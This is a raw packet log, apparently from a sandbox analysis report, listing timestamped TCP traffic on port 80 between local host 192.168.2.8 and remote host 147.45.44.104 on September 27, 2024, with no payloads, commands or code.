Sep 27, 2024 01:49:55.738337994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738337994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738337994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738337994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738337994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738337994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738368988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738380909 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738393068 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738396883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738405943 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738411903 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738415956 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738423109 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738434076 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738465071 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738475084 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738486052 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738508940 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738508940 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738508940 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738512993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738519907 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738524914 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738535881 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738547087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738554955 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738558054 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738569021 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738573074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738615990 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738627911 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738640070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738651991 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738699913 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738699913 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738699913 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738718033 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738729000 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738739014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738756895 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738775015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738785982 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738801003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738818884 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738830090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738836050 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738836050 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738836050 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738847971 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738857031 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738866091 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738871098 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738920927 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738939047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738951921 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738957882 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738957882 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738965034 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738996983 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739067078 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739078045 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739089012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739105940 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739113092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739118099 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739124060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739134073 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739134073 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739227057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739238024 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739249945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739259005 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739270926 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739293098 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739293098 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739334106 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739345074 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739356995 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739368916 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739382029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739399910 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739403009 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739403009 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739403009 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739413977 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739479065 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739490032 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739500999 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739512920 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739525080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739537001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739547968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739547968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739548922 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739554882 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739562035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739573956 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739584923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739597082 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739600897 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739600897 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739608049 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739614010 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739624977 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.739700079 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.739700079 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.823523998 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.823599100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.823633909 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.823668003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.823702097 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.823734999 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.823759079 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.823759079 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.823791027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.823895931 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.825644016 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.825699091 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.825707912 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.825763941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.825764894 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.825776100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.825788021 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.825798988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.825810909 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.825824976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.825824976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.825839043 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.829962015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.829974890 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.829986095 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.829997063 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830024004 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830035925 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830039978 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830064058 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830066919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830077887 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830090046 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830090046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830101967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830105066 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830107927 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830138922 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830149889 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830156088 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830163002 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830210924 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830210924 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830248117 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830260038 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830270052 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830276012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830308914 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830346107 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830355883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830367088 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830384016 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830385923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830410004 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830410004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830420971 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830440044 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830457926 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830476999 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830478907 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830478907 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830488920 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830501080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830512047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830549955 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830549955 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830571890 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830583096 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830594063 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830600023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830610991 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830655098 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830655098 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830713034 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830799103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830810070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830825090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830848932 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830853939 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830861092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830873966 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830879927 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830885887 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830912113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830923080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830933094 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830941916 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830941916 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.830945015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830955982 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.830966949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831022978 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831022978 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831022978 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831031084 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831048012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831058025 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831069946 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831079960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831110001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831120014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831125021 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831129074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831129074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831129074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831135988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831156969 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831175089 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831193924 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831207037 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831208944 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831208944 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831219912 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831231117 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831243038 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831270933 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831270933 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831271887 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831284046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831295013 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831305027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831315994 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831336021 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831336021 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831336021 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831342936 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831355095 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831367016 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831403971 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831432104 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831442118 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831454039 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831465006 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831476927 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831486940 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831549883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831561089 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831572056 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831584930 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831613064 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831629038 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831640959 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831653118 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831664085 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831676006 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831686020 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831686020 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831686974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831686020 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831686020 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831686974 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831700087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831703901 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831712008 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831717968 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831743956 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831753016 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831759930 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831770897 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831800938 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831804037 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831804037 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831804037 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831814051 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831824064 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831835032 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831846952 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.831885099 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.831885099 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.832505941 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.872119904 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.160593033 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.160744905 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.160909891 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.160928965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.160944939 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.160960913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161000967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161022902 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161039114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161053896 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161068916 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161077023 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161077023 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161086082 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161103010 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161156893 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161174059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161190033 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161206007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161221981 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161221981 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161242962 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161252022 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161278009 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161297083 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161310911 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161329031 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161345959 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161360979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161376953 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161392927 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161436081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161468029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161484003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161484957 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161484957 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161484957 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161501884 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161514997 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161520004 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161535025 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161536932 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161552906 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161566973 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161581039 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161581039 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161600113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161621094 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161643028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161659002 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161674023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161689043 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161689997 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161704063 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161719084 CEST	80	49743	147.45.44.104	192.168.2.8
